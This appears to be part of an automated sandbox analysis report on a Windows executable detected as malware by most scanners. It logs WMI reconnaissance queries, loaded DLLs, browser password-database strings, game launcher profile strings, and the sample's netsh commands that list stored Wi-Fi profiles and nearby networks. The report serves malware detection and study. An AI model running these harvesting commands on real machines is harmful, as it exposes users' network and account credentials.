Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

File read: C:\Users\user\Documents\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpCE7B.tmp.dat.0.dr, tmpCEC0.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: eEo6DAcnnx.exe	ReversingLabs: Detection: 84%
Source: eEo6DAcnnx.exe	Virustotal: Detection: 86%

Source: eEo6DAcnnx.exe

String found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json

Source: unknown	Process created: C:\Users\user\Desktop\eEo6DAcnnx.exe "C:\Users\user\Desktop\eEo6DAcnnx.exe"
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
